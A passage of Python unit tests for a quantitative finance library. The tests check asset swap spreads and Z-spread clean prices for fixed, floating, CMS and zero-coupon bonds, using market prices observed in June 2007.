zeroCpnBondPrice2 = zeroCpnBond2.cleanPrice()
zeroCpnAssetSwap2 = AssetSwap(payFixedRate,
zeroCpnBond2, zeroCpnBondPrice2,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
zeroCpnAssetSwap2.setPricingEngine(swapEngine)
zeroCpnBondAssetSwapPrice2 = zeroCpnAssetSwap2.fairCleanPrice()
error9 = abs(zeroCpnBondAssetSwapPrice2-zeroCpnBondPrice2)
self.assertFalse(error9>tolerance,
"wrong zero spread asset swap price for zero cpn bond:"
+ "\n bond's clean price: " + str(zeroCpnBondPrice2)
+ "\n asset swap fair price: " + str(zeroCpnBondAssetSwapPrice2)
+ "\n error: " + str(error9)
+ "\n tolerance: " + str(tolerance))
def testMASWWithGenericBond(self):
"""Testing market asset swap against par asset swap with generic bond..."""
bondCalendar = TARGET()
settlementDays = 3
fixingDays = 2
payFixedRate = True
parAssetSwap = True
mktAssetSwap = False
inArrears = False
## Fixed Underlying bond (Isin: DE0001135275 DBR 4 01/04/37)
## maturity doesn't occur on a business day
fixedBondStartDate1 = Date(4,January,2005)
fixedBondMaturityDate1 = Date(4,January,2037)
fixedBondSchedule1 = Schedule(fixedBondStartDate1,
fixedBondMaturityDate1,
Period(Annual), bondCalendar,
Unadjusted, Unadjusted,
DateGeneration.Backward, False)
fixedBondLeg1 = list(FixedRateLeg(fixedBondSchedule1,
ActualActual(ActualActual.ISDA),
[self.faceAmount], [0.04]))
fixedbondRedemption1 = bondCalendar.adjust(fixedBondMaturityDate1, Following)
fixedBondLeg1.append(SimpleCashFlow(100.0, fixedbondRedemption1))
fixedBond1 = Bond(settlementDays, bondCalendar, self.faceAmount,
fixedBondMaturityDate1, fixedBondStartDate1,
fixedBondLeg1)
bondEngine = DiscountingBondEngine(self.termStructure)
swapEngine = DiscountingSwapEngine(self.termStructure, False)
fixedBond1.setPricingEngine(bondEngine)
fixedBondMktPrice1 = 89.22 ## market price observed on 7th June 2007
fixedBondMktFullPrice1 = fixedBondMktPrice1+fixedBond1.accruedAmount()
fixedBondParAssetSwap1 = AssetSwap(payFixedRate,
fixedBond1, fixedBondMktPrice1,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
fixedBondParAssetSwap1.setPricingEngine(swapEngine)
fixedBondParAssetSwapSpread1 = fixedBondParAssetSwap1.fairSpread()
fixedBondMktAssetSwap1 = AssetSwap(payFixedRate,
fixedBond1, fixedBondMktPrice1,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
mktAssetSwap)
fixedBondMktAssetSwap1.setPricingEngine(swapEngine)
fixedBondMktAssetSwapSpread1 = fixedBondMktAssetSwap1.fairSpread()
tolerance = 1.0e-13
## market and par asset swap spreads are related through the bond's full price:
## mktSpread = 100 * parSpread / fullPrice
error1 = abs(fixedBondMktAssetSwapSpread1-
100*fixedBondParAssetSwapSpread1/fixedBondMktFullPrice1)
self.assertFalse(error1>tolerance,
"wrong asset swap spreads for fixed bond:"
+ "\n market asset swap spread: " + str(fixedBondMktAssetSwapSpread1)
+ "\n par asset swap spread: " + str(fixedBondParAssetSwapSpread1)
+ "\n error: " + str(error1)
+ "\n tolerance: " + str(tolerance))
## Fixed Underlying bond (Isin: IT0006527060 IBRD 5 02/05/19)
## maturity occurs on a business day
fixedBondStartDate2 = Date(5,February,2005)
fixedBondMaturityDate2 = Date(5,February,2019)
fixedBondSchedule2 = Schedule(fixedBondStartDate2,
fixedBondMaturityDate2,
Period(Annual), bondCalendar,
Unadjusted, Unadjusted,
DateGeneration.Backward, False)
fixedBondLeg2 = list(FixedRateLeg(fixedBondSchedule2,
Thirty360(Thirty360.BondBasis),
[self.faceAmount], [0.05]))
fixedbondRedemption2 = bondCalendar.adjust(fixedBondMaturityDate2, Following)
fixedBondLeg2.append(SimpleCashFlow(100.0, fixedbondRedemption2))
fixedBond2 = Bond(settlementDays, bondCalendar, self.faceAmount,
fixedBondMaturityDate2, fixedBondStartDate2, fixedBondLeg2)
fixedBond2.setPricingEngine(bondEngine)
fixedBondMktPrice2 = 99.98 ## market price observed on 7th June 2007
fixedBondMktFullPrice2 = fixedBondMktPrice2+fixedBond2.accruedAmount()
fixedBondParAssetSwap2 = AssetSwap(payFixedRate,
fixedBond2, fixedBondMktPrice2,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
fixedBondParAssetSwap2.setPricingEngine(swapEngine)
fixedBondParAssetSwapSpread2 = fixedBondParAssetSwap2.fairSpread()
fixedBondMktAssetSwap2 = AssetSwap(payFixedRate,
fixedBond2, fixedBondMktPrice2,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
mktAssetSwap)
fixedBondMktAssetSwap2.setPricingEngine(swapEngine)
fixedBondMktAssetSwapSpread2 = fixedBondMktAssetSwap2.fairSpread()
error2 = abs(fixedBondMktAssetSwapSpread2-
100*fixedBondParAssetSwapSpread2/fixedBondMktFullPrice2)
self.assertFalse(error2>tolerance,
"wrong asset swap spreads for fixed bond:"
+ "\n market asset swap spread: " + str(fixedBondMktAssetSwapSpread2)
+ "\n par asset swap spread: " + str(fixedBondParAssetSwapSpread2)
+ "\n error: " + str(error2)
+ "\n tolerance: " + str(tolerance))
## FRN Underlying bond (Isin: IT0003543847 ISPIM 0 09/29/13)
## maturity doesn't occur on a business day
floatingBondStartDate1 = Date(29,September,2003)
floatingBondMaturityDate1 = Date(29,September,2013)
floatingBondSchedule1 = Schedule(floatingBondStartDate1,
floatingBondMaturityDate1,
Period(Semiannual), bondCalendar,
Unadjusted, Unadjusted,
DateGeneration.Backward, False)
floatingBondLeg1 = list(IborLeg([self.faceAmount],floatingBondSchedule1, self.iborIndex,Actual360(),Following,
[fixingDays], [],[0.0056],[],[],inArrears))
floatingbondRedemption1 = bondCalendar.adjust(floatingBondMaturityDate1, Following)
floatingBondLeg1.append(SimpleCashFlow(100.0, floatingbondRedemption1))
floatingBond1 = Bond(settlementDays, bondCalendar, self.faceAmount,
floatingBondMaturityDate1, floatingBondStartDate1,
floatingBondLeg1)
floatingBond1.setPricingEngine(bondEngine)
setCouponPricer(floatingBond1.cashflows(), self.pricer)
self.iborIndex.addFixing(Date(27,March,2007), 0.0402)
## market price observed on 7th June 2007
floatingBondMktPrice1 = 101.64
floatingBondMktFullPrice1 = floatingBondMktPrice1+floatingBond1.accruedAmount()
floatingBondParAssetSwap1 = AssetSwap(payFixedRate,
floatingBond1, floatingBondMktPrice1,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
floatingBondParAssetSwap1.setPricingEngine(swapEngine)
floatingBondParAssetSwapSpread1 = floatingBondParAssetSwap1.fairSpread()
floatingBondMktAssetSwap1 = AssetSwap(payFixedRate,
floatingBond1, floatingBondMktPrice1,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
mktAssetSwap)
floatingBondMktAssetSwap1.setPricingEngine(swapEngine)
floatingBondMktAssetSwapSpread1 = floatingBondMktAssetSwap1.fairSpread()
error3 = abs(floatingBondMktAssetSwapSpread1-
100*floatingBondParAssetSwapSpread1/floatingBondMktFullPrice1)
self.assertFalse(error3>tolerance,
"wrong asset swap spreads for floating bond:"
+ "\n market asset swap spread: " + str(floatingBondMktAssetSwapSpread1)
+ "\n par asset swap spread: " + str(floatingBondParAssetSwapSpread1)
+ "\n error: " + str(error3)
+ "\n tolerance: " + str(tolerance))
## FRN Underlying bond (Isin: XS0090566539 COE 0 09/24/18)
## maturity occurs on a business day
floatingBondStartDate2 = Date(24,September,2004)
floatingBondMaturityDate2 = Date(24,September,2018)
floatingBondSchedule2 = Schedule(floatingBondStartDate2,
floatingBondMaturityDate2,
Period(Semiannual), bondCalendar,
ModifiedFollowing, ModifiedFollowing,
DateGeneration.Backward, False)
floatingBondLeg2 = list(IborLeg([self.faceAmount],floatingBondSchedule2, self.iborIndex, Actual360(),
ModifiedFollowing, [fixingDays], [], [0.0025] , [],[], inArrears))
floatingbondRedemption2 = bondCalendar.adjust(floatingBondMaturityDate2, ModifiedFollowing)
floatingBondLeg2.append(SimpleCashFlow(100.0, floatingbondRedemption2))
floatingBond2 = Bond(settlementDays, bondCalendar, self.faceAmount,
floatingBondMaturityDate2, floatingBondStartDate2,
floatingBondLeg2)
floatingBond2.setPricingEngine(bondEngine)
setCouponPricer(floatingBond2.cashflows(), self.pricer)
self.iborIndex.addFixing(Date(22,March,2007), 0.04013)
## market price observed on 7th June 2007
floatingBondMktPrice2 = 101.248
floatingBondMktFullPrice2 = floatingBondMktPrice2+floatingBond2.accruedAmount()
floatingBondParAssetSwap2 = AssetSwap(payFixedRate,
floatingBond2, floatingBondMktPrice2,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
floatingBondParAssetSwap2.setPricingEngine(swapEngine)
floatingBondParAssetSwapSpread2 = floatingBondParAssetSwap2.fairSpread()
floatingBondMktAssetSwap2 = AssetSwap(payFixedRate,
floatingBond2, floatingBondMktPrice2,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
mktAssetSwap)
floatingBondMktAssetSwap2.setPricingEngine(swapEngine)
floatingBondMktAssetSwapSpread2 = floatingBondMktAssetSwap2.fairSpread()
error4 = abs(floatingBondMktAssetSwapSpread2-
100*floatingBondParAssetSwapSpread2/floatingBondMktFullPrice2)
self.assertFalse(error4>tolerance,
"wrong asset swap spreads for floating bond:"
+ "\n market asset swap spread: " + str(floatingBondMktAssetSwapSpread2)
+ "\n par asset swap spread: " + str(floatingBondParAssetSwapSpread2)
+ "\n error: " + str(error4)
+ "\n tolerance: " + str(tolerance))
## CMS Underlying bond (Isin: XS0228052402 CRDIT 0 8/22/20)
## maturity doesn't occur on a business day
cmsBondStartDate1 = Date(22,August,2005)
cmsBondMaturityDate1 = Date(22,August,2020)
cmsBondSchedule1 = Schedule(cmsBondStartDate1,
cmsBondMaturityDate1,
Period(Annual), bondCalendar,
Unadjusted, Unadjusted,
DateGeneration.Backward, False)
cmsBondLeg1 = list(CmsLeg([self.faceAmount],cmsBondSchedule1, self.swapIndex,
Thirty360(),Following,[fixingDays],[],[],[0.055],[0.025],inArrears))
cmsbondRedemption1 = bondCalendar.adjust(cmsBondMaturityDate1, Following)
cmsBondLeg1.append(SimpleCashFlow(100.0, cmsbondRedemption1))
cmsBond1 = Bond(settlementDays, bondCalendar, self.faceAmount,
cmsBondMaturityDate1, cmsBondStartDate1, cmsBondLeg1)
cmsBond1.setPricingEngine(bondEngine)
setCouponPricer(cmsBond1.cashflows(), self.cmspricer)
self.swapIndex.addFixing(Date(18,August,2006), 0.04158)
cmsBondMktPrice1 = 88.45 ## market price observed on 7th June 2007
cmsBondMktFullPrice1 = cmsBondMktPrice1+cmsBond1.accruedAmount()
cmsBondParAssetSwap1 = AssetSwap(payFixedRate,
cmsBond1, cmsBondMktPrice1,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
cmsBondParAssetSwap1.setPricingEngine(swapEngine)
cmsBondParAssetSwapSpread1 = cmsBondParAssetSwap1.fairSpread()
cmsBondMktAssetSwap1 = AssetSwap(payFixedRate,
cmsBond1, cmsBondMktPrice1,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
mktAssetSwap)
cmsBondMktAssetSwap1.setPricingEngine(swapEngine)
cmsBondMktAssetSwapSpread1 = cmsBondMktAssetSwap1.fairSpread()
error5 = abs(cmsBondMktAssetSwapSpread1-
100*cmsBondParAssetSwapSpread1/cmsBondMktFullPrice1)
self.assertFalse(error5>tolerance,
"wrong asset swap spreads for cms bond:"
+ "\n market asset swap spread: " + str(cmsBondMktAssetSwapSpread1)
+ "\n par asset swap spread: " + str(100*cmsBondParAssetSwapSpread1/cmsBondMktFullPrice1)
+ "\n error: " + str(error5)
+ "\n tolerance: " + str(tolerance))
## CMS Underlying bond (Isin: XS0218766664 ISPIM 0 5/6/15)
## maturity occurs on a business day
cmsBondStartDate2 = Date(6,May,2005)
cmsBondMaturityDate2 = Date(6,May,2015)
cmsBondSchedule2 = Schedule(cmsBondStartDate2,
cmsBondMaturityDate2,
Period(Annual), bondCalendar,
Unadjusted, Unadjusted,
DateGeneration.Backward, False)
cmsBondLeg2 = list(CmsLeg([self.faceAmount],cmsBondSchedule2, self.swapIndex,
Thirty360(),Following,[fixingDays],[0.84],[],[],[],inArrears))
cmsbondRedemption2 = bondCalendar.adjust(cmsBondMaturityDate2, Following)
cmsBondLeg2.append(SimpleCashFlow(100.0, cmsbondRedemption2))
cmsBond2 = Bond(settlementDays, bondCalendar, self.faceAmount,
cmsBondMaturityDate2, cmsBondStartDate2, cmsBondLeg2)
cmsBond2.setPricingEngine(bondEngine)
setCouponPricer(cmsBond2.cashflows(), self.cmspricer)
self.swapIndex.addFixing(Date(4,May,2006), 0.04217)
cmsBondMktPrice2 = 94.08 ## market price observed on 7th June 2007
cmsBondMktFullPrice2 = cmsBondMktPrice2+cmsBond2.accruedAmount()
cmsBondParAssetSwap2 = AssetSwap(payFixedRate,
cmsBond2, cmsBondMktPrice2,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
cmsBondParAssetSwap2.setPricingEngine(swapEngine)
cmsBondParAssetSwapSpread2 = cmsBondParAssetSwap2.fairSpread()
cmsBondMktAssetSwap2 = AssetSwap(payFixedRate,
cmsBond2, cmsBondMktPrice2,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
mktAssetSwap)
cmsBondMktAssetSwap2.setPricingEngine(swapEngine)
cmsBondMktAssetSwapSpread2 = cmsBondMktAssetSwap2.fairSpread()
error6 = abs(cmsBondMktAssetSwapSpread2-
100*cmsBondParAssetSwapSpread2/cmsBondMktFullPrice2)
self.assertFalse(error6>tolerance,
"wrong asset swap spreads for cms bond:"
+ "\n market asset swap spread: " + str(cmsBondMktAssetSwapSpread2)
+ "\n par asset swap spread: " + str(cmsBondParAssetSwapSpread2)
+ "\n error: " + str(error6)
+ "\n tolerance: " + str(tolerance))
## Zero Coupon bond (Isin: DE0004771662 IBRD 0 12/20/15)
## maturity doesn't occur on a business day
zeroCpnBondStartDate1 = Date(19,December,1985)
zeroCpnBondMaturityDate1 = Date(20,December,2015)
zeroCpnBondRedemption1 = bondCalendar.adjust(zeroCpnBondMaturityDate1,
Following)
zeroCpnBondLeg1 = Leg([SimpleCashFlow(100.0, zeroCpnBondRedemption1)])
zeroCpnBond1 = Bond(settlementDays, bondCalendar, self.faceAmount,
zeroCpnBondMaturityDate1, zeroCpnBondStartDate1, zeroCpnBondLeg1)
zeroCpnBond1.setPricingEngine(bondEngine)
## market price observed on 12th June 2007
zeroCpnBondMktPrice1 = 70.436
zeroCpnBondMktFullPrice1 = zeroCpnBondMktPrice1+zeroCpnBond1.accruedAmount()
zeroCpnBondParAssetSwap1 = AssetSwap(payFixedRate,zeroCpnBond1,
zeroCpnBondMktPrice1,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
zeroCpnBondParAssetSwap1.setPricingEngine(swapEngine)
zeroCpnBondParAssetSwapSpread1 = zeroCpnBondParAssetSwap1.fairSpread()
zeroCpnBondMktAssetSwap1 = AssetSwap(payFixedRate,zeroCpnBond1,
zeroCpnBondMktPrice1,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
mktAssetSwap)
zeroCpnBondMktAssetSwap1.setPricingEngine(swapEngine)
zeroCpnBondMktAssetSwapSpread1 = zeroCpnBondMktAssetSwap1.fairSpread()
error7 = abs(zeroCpnBondMktAssetSwapSpread1-
100*zeroCpnBondParAssetSwapSpread1/zeroCpnBondMktFullPrice1)
self.assertFalse(error7>tolerance,
"wrong asset swap spreads for zero cpn bond:"
+ "\n market asset swap spread: " + str(zeroCpnBondMktAssetSwapSpread1)
+ "\n par asset swap spread: " + str(zeroCpnBondParAssetSwapSpread1)
+ "\n error: " + str(error7)
+ "\n tolerance: " + str(tolerance))
## Zero Coupon bond (Isin: IT0001200390 ISPIM 0 02/17/28)
## maturity occurs on a business day
zeroCpnBondStartDate2 = Date(17,February,1998)
zeroCpnBondMaturityDate2 = Date(17,February,2028)
zerocpbondRedemption2 = bondCalendar.adjust(zeroCpnBondMaturityDate2,
Following)
zeroCpnBondLeg2 = Leg([SimpleCashFlow(100.0, zerocpbondRedemption2)])
zeroCpnBond2 = Bond(settlementDays, bondCalendar, self.faceAmount,
zeroCpnBondMaturityDate2, zeroCpnBondStartDate2, zeroCpnBondLeg2)
zeroCpnBond2.setPricingEngine(bondEngine)
## market price observed on 12th June 2007
zeroCpnBondMktPrice2 = 35.160
zeroCpnBondMktFullPrice2 = zeroCpnBondMktPrice2+zeroCpnBond2.accruedAmount()
zeroCpnBondParAssetSwap2 = AssetSwap(payFixedRate,zeroCpnBond2,
zeroCpnBondMktPrice2,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
zeroCpnBondParAssetSwap2.setPricingEngine(swapEngine)
zeroCpnBondParAssetSwapSpread2 = zeroCpnBondParAssetSwap2.fairSpread()
zeroCpnBondMktAssetSwap2 = AssetSwap(payFixedRate,zeroCpnBond2,
zeroCpnBondMktPrice2,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
mktAssetSwap)
zeroCpnBondMktAssetSwap2.setPricingEngine(swapEngine)
zeroCpnBondMktAssetSwapSpread2 = zeroCpnBondMktAssetSwap2.fairSpread()
error8 = abs(zeroCpnBondMktAssetSwapSpread2-
100*zeroCpnBondParAssetSwapSpread2/zeroCpnBondMktFullPrice2)
self.assertFalse(error8>tolerance,
"wrong asset swap spreads for zero cpn bond:"
+ "\n market asset swap spread: " + str(zeroCpnBondMktAssetSwapSpread2)
+ "\n par asset swap spread: " + str(zeroCpnBondParAssetSwapSpread2)
+ "\n error: " + str(error8)
+ "\n tolerance: " + str(tolerance))
def testZSpreadWithGenericBond(self) :
"""Testing clean and dirty price with null Z-spread against theoretical prices..."""
bondCalendar = TARGET()
settlementDays = 3
fixingDays = 2
inArrears = False
## Fixed Underlying bond (Isin: DE0001135275 DBR 4 01/04/37)
## maturity doesn't occur on a business day
fixedBondStartDate1 = Date(4,January,2005)
fixedBondMaturityDate1 = Date(4,January,2037)
fixedBondSchedule1 = Schedule(fixedBondStartDate1,
fixedBondMaturityDate1,
Period(Annual), bondCalendar,
Unadjusted, Unadjusted,
DateGeneration.Backward, False)
fixedBondLeg1 = list(FixedRateLeg(fixedBondSchedule1, ActualActual(ActualActual.ISDA), [self.faceAmount], [0.04]))
fixedbondRedemption1 = bondCalendar.adjust(fixedBondMaturityDate1, Following)
fixedBondLeg1.append(SimpleCashFlow(100.0, fixedbondRedemption1))
fixedBond1 = Bond(settlementDays, bondCalendar, self.faceAmount,
fixedBondMaturityDate1, fixedBondStartDate1,
fixedBondLeg1)
bondEngine = DiscountingBondEngine(self.termStructure)
fixedBond1.setPricingEngine(bondEngine)
fixedBondImpliedValue1 = fixedBond1.cleanPrice()
fixedBondSettlementDate1 = fixedBond1.settlementDate()
## standard market conventions:
## bond's frequency + compounding and daycounter of the YieldCurve
fixedBondCleanPrice1 = cleanPriceFromZSpread(fixedBond1, self.yieldCurve, self.spread,
Actual365Fixed(), self.compounding, Annual, fixedBondSettlementDate1)
tolerance = 1.0e-13
error1 = abs(fixedBondImpliedValue1-fixedBondCleanPrice1)
self.assertFalse(error1>tolerance,
"wrong clean price for fixed bond:"
+ "\n market asset swap spread: " + str(fixedBondImpliedValue1)
+ "\n par asset swap spread: " + str(fixedBondCleanPrice1)
+ "\n error: " + str(error1)
+ "\n tolerance: " + str(tolerance))
## Fixed Underlying bond (Isin: IT0006527060 IBRD 5 02/05/19)
## maturity occurs on a business day
fixedBondStartDate2 = Date(5,February,2005)
fixedBondMaturityDate2 = Date(5,February,2019)
fixedBondSchedule2 = Schedule(fixedBondStartDate2,
fixedBondMaturityDate2,
Period(Annual), bondCalendar,
Unadjusted, Unadjusted,
DateGeneration.Backward, False)
fixedBondLeg2 = list(FixedRateLeg(fixedBondSchedule2, Thirty360(Thirty360.BondBasis),
[self.faceAmount],[0.05]))
fixedbondRedemption2 = bondCalendar.adjust(fixedBondMaturityDate2, Following)
fixedBondLeg2.append(SimpleCashFlow(100.0, fixedbondRedemption2))
fixedBond2 = Bond(settlementDays, bondCalendar, self.faceAmount,
fixedBondMaturityDate2, fixedBondStartDate2, fixedBondLeg2)
fixedBond2.setPricingEngine(bondEngine)
fixedBondImpliedValue2 = fixedBond2.cleanPrice()
fixedBondSettlementDate2 = fixedBond2.settlementDate()
## standard market conventions:
## bond's frequency + compounding and daycounter of the YieldCurve
fixedBondCleanPrice2 = cleanPriceFromZSpread(fixedBond2, self.yieldCurve, self.spread,
Actual365Fixed(), self.compounding, Annual, fixedBondSettlementDate2)
error3 = abs(fixedBondImpliedValue2-fixedBondCleanPrice2)
self.assertFalse(error3>tolerance,
"wrong clean price for fixed bond:"
+ "\n market asset swap spread: " + str(fixedBondImpliedValue2)
+ "\n par asset swap spread: " + str(fixedBondCleanPrice2)
+ "\n error: " + str(error3)
+ "\n tolerance: " + str(tolerance))
## FRN Underlying bond (Isin: IT0003543847 ISPIM 0 09/29/13)
## maturity doesn't occur on a business day
floatingBondStartDate1 = Date(29,September,2003)
floatingBondMaturityDate1 = Date(29,September,2013)
floatingBondSchedule1 = Schedule(floatingBondStartDate1,
floatingBondMaturityDate1,
Period(Semiannual), bondCalendar,
Unadjusted, Unadjusted,
DateGeneration.Backward, False)
floatingBondLeg1 = list(IborLeg([self.faceAmount],floatingBondSchedule1, self.iborIndex,
Actual360(),Following,[fixingDays], [],[0.0056],[],[], inArrears))
floatingbondRedemption1 = bondCalendar.adjust(floatingBondMaturityDate1, Following)
floatingBondLeg1.append(SimpleCashFlow(100.0, floatingbondRedemption1))
floatingBond1 = Bond(settlementDays, bondCalendar, self.faceAmount,
floatingBondMaturityDate1, floatingBondStartDate1,
floatingBondLeg1)
floatingBond1.setPricingEngine(bondEngine)
setCouponPricer(floatingBond1.cashflows(), self.pricer)
self.iborIndex.addFixing(Date(27,March,2007), 0.0402)
floatingBondImpliedValue1 = floatingBond1.cleanPrice()
floatingBondSettlementDate1 = floatingBond1.settlementDate()
## standard market conventions:
## bond's frequency + compounding and daycounter of the YieldCurve
floatingBondCleanPrice1 = cleanPriceFromZSpread(floatingBond1, self.yieldCurve,
self.spread, Actual365Fixed(), self.compounding, Semiannual,
floatingBondSettlementDate1)
error5 = abs(floatingBondImpliedValue1-floatingBondCleanPrice1)
self.assertFalse(error5>tolerance,
"wrong clean price for fixed bond:"
+ "\n market asset swap spread: " + str(floatingBondImpliedValue1)
+ "\n par asset swap spread: " + str(floatingBondCleanPrice1)
+ "\n error: " + str(error5)
+ "\n tolerance: " + str(tolerance))
## FRN Underlying bond (Isin: XS0090566539 COE 0 09/24/18)
## maturity occurs on a business day
floatingBondStartDate2 = Date(24,September,2004)
floatingBondMaturityDate2 = Date(24,September,2018)
floatingBondSchedule2 = Schedule(floatingBondStartDate2,
floatingBondMaturityDate2,
Period(Semiannual), bondCalendar,
ModifiedFollowing, ModifiedFollowing,
DateGeneration.Backward, False)
floatingBondLeg2 = list(IborLeg([self.faceAmount],floatingBondSchedule2, self.iborIndex,
Actual360(),ModifiedFollowing, [fixingDays],[],[0.0025],[],[], inArrears))
floatingbondRedemption2 = bondCalendar.adjust(floatingBondMaturityDate2, ModifiedFollowing)
floatingBondLeg2.append(SimpleCashFlow(100.0, floatingbondRedemption2))
floatingBond2 = Bond(settlementDays, bondCalendar, self.faceAmount,
floatingBondMaturityDate2, floatingBondStartDate2, floatingBondLeg2)
floatingBond2.setPricingEngine(bondEngine)
setCouponPricer(floatingBond2.cashflows(), self.pricer)
self.iborIndex.addFixing(Date(22,March,2007), 0.04013)
floatingBondImpliedValue2 = floatingBond2.cleanPrice()
floatingBondSettlementDate2 = floatingBond2.settlementDate()
## standard market conventions:
## bond's frequency + compounding and daycounter of the YieldCurve
floatingBondCleanPrice2 = cleanPriceFromZSpread(floatingBond2, self.yieldCurve,
self.spread, Actual365Fixed(), self.compounding, Semiannual, floatingBondSettlementDate2)
error7 = abs(floatingBondImpliedValue2-floatingBondCleanPrice2)
self.assertFalse(error7>tolerance,
"wrong clean price for fixed bond:"
+ "\n market asset swap spread: " + str(floatingBondImpliedValue2)
+ "\n par asset swap spread: " + str(floatingBondCleanPrice2)
+ "\n error: " + str(error7)
+ "\n tolerance: " + str(tolerance))
## CMS Underlying bond (Isin: XS0228052402 CRDIT 0 8/22/20)
## maturity doesn't occur on a business day
cmsBondStartDate1 = Date(22,August,2005)
cmsBondMaturityDate1 = Date(22,August,2020)
cmsBondSchedule1 = Schedule(cmsBondStartDate1,
cmsBondMaturityDate1,
Period(Annual), bondCalendar,
Unadjusted, Unadjusted,
DateGeneration.Backward, False)
cmsBondLeg1 = list(CmsLeg([self.faceAmount],cmsBondSchedule1, self.swapIndex,
Thirty360(),Following,[fixingDays],[],[],[0.055],[0.025],inArrears))
cmsbondRedemption1 = bondCalendar.adjust(cmsBondMaturityDate1, Following)
cmsBondLeg1.append(SimpleCashFlow(100.0, cmsbondRedemption1))
cmsBond1 = Bond(settlementDays, bondCalendar, self.faceAmount,
cmsBondMaturityDate1, cmsBondStartDate1, cmsBondLeg1)
cmsBond1.setPricingEngine(bondEngine)
setCouponPricer(cmsBond1.cashflows(), self.cmspricer)
self.swapIndex.addFixing(Date(18,August,2006), 0.04158)
cmsBondImpliedValue1 = cmsBond1.cleanPrice()
cmsBondSettlementDate1 = cmsBond1.settlementDate()
## standard market conventions:
## bond's frequency + compounding and daycounter of the YieldCurve
cmsBondCleanPrice1 = cleanPriceFromZSpread(cmsBond1, self.yieldCurve, self.spread,
Actual365Fixed(), self.compounding, Annual, cmsBondSettlementDate1)
error9 = abs(cmsBondImpliedValue1-cmsBondCleanPrice1)
self.assertFalse(error9>tolerance,
"wrong clean price for fixed bond:"
+ "\n market asset swap spread: " + str(cmsBondImpliedValue1)
+ "\n par asset swap spread: " + str(cmsBondCleanPrice1)
+ "\n error: " + str(error9)
+ "\n tolerance: " + str(tolerance))
## CMS Underlying bond (Isin: XS0218766664 ISPIM 0 5/6/15)
## maturity occurs on a business day
cmsBondStartDate2 = Date(6,May,2005)
cmsBondMaturityDate2 = Date(6,May,2015)
cmsBondSchedule2 = Schedule(cmsBondStartDate2,
cmsBondMaturityDate2,
Period(Annual), bondCalendar,
Unadjusted, Unadjusted,
DateGeneration.Backward, False)
cmsBondLeg2 = list(CmsLeg([self.faceAmount],cmsBondSchedule2, self.swapIndex,
Thirty360(),Following,[fixingDays],[0.84],[],[],[],inArrears))
cmsbondRedemption2 = bondCalendar.adjust(cmsBondMaturityDate2, Following)
cmsBondLeg2.append(SimpleCashFlow(100.0, cmsbondRedemption2))
cmsBond2 = Bond(settlementDays, bondCalendar, self.faceAmount,
cmsBondMaturityDate2, cmsBondStartDate2, cmsBondLeg2)
cmsBond2.setPricingEngine(bondEngine)
setCouponPricer(cmsBond2.cashflows(), self.cmspricer)
self.swapIndex.addFixing(Date(4,May,2006), 0.04217)
cmsBondImpliedValue2 = cmsBond2.cleanPrice()
cmsBondSettlementDate2 = cmsBond2.settlementDate()
## standard market conventions:
## bond's frequency + compounding and daycounter of the YieldCurve
cmsBondCleanPrice2 = cleanPriceFromZSpread(cmsBond2, self.yieldCurve, self.spread,
Actual365Fixed(), self.compounding, Annual, cmsBondSettlementDate2)
error11 = abs(cmsBondImpliedValue2-cmsBondCleanPrice2)
self.assertFalse(error11>tolerance,
"wrong clean price for fixed bond:"
+ "\n market asset swap spread: " + str(cmsBondImpliedValue2)
+ "\n par asset swap spread: " + str(cmsBondCleanPrice2)
+ "\n error: " + str(error11)
+ "\n tolerance: " + str(tolerance))
## Zero Coupon bond (Isin: DE0004771662 IBRD 0 12/20/15)
## maturity doesn't occur on a business day
zeroCpnBondStartDate1 = Date(19,December,1985)
zeroCpnBondMaturityDate1 = Date(20,December,2015)
zeroCpnBondRedemption1 = bondCalendar.adjust(zeroCpnBondMaturityDate1,
Following)
zeroCpnBondLeg1 = Leg([SimpleCashFlow(100.0, zeroCpnBondRedemption1)])
zeroCpnBond1 = Bond(settlementDays, bondCalendar, self.faceAmount,
zeroCpnBondMaturityDate1, zeroCpnBondStartDate1, zeroCpnBondLeg1)
zeroCpnBond1.setPricingEngine(bondEngine)
zeroCpnBondImpliedValue1 = zeroCpnBond1.cleanPrice()
zeroCpnBondSettlementDate1 = zeroCpnBond1.settlementDate()
## standard market conventions:
## bond's frequency + compounding and daycounter of the YieldCurve
zeroCpnBondCleanPrice1 = cleanPriceFromZSpread(zeroCpnBond1, self.yieldCurve,
self.spread,
Actual365Fixed(),
self.compounding, Annual,
zeroCpnBondSettlementDate1)
error13 = abs(zeroCpnBondImpliedValue1-zeroCpnBondCleanPrice1)
self.assertFalse(error13>tolerance,
"wrong clean price for zero coupon bond:"
+ "\n zero cpn implied value: " + str(zeroCpnBondImpliedValue1)
+ "\n zero cpn price: " + str(zeroCpnBondCleanPrice1)
+ "\n error: " + str(error13)
+ "\n tolerance: " + str(tolerance))
## Zero Coupon bond (Isin: IT0001200390 ISPIM 0 02/17/28)
## maturity occurs on a business day
zeroCpnBondStartDate2 = Date(17,February,1998)
zeroCpnBondMaturityDate2 = Date(17,February,2028)
zerocpbondRedemption2 = bondCalendar.adjust(zeroCpnBondMaturityDate2, Following)
zeroCpnBondLeg2 = Leg([SimpleCashFlow(100.0, zerocpbondRedemption2)])
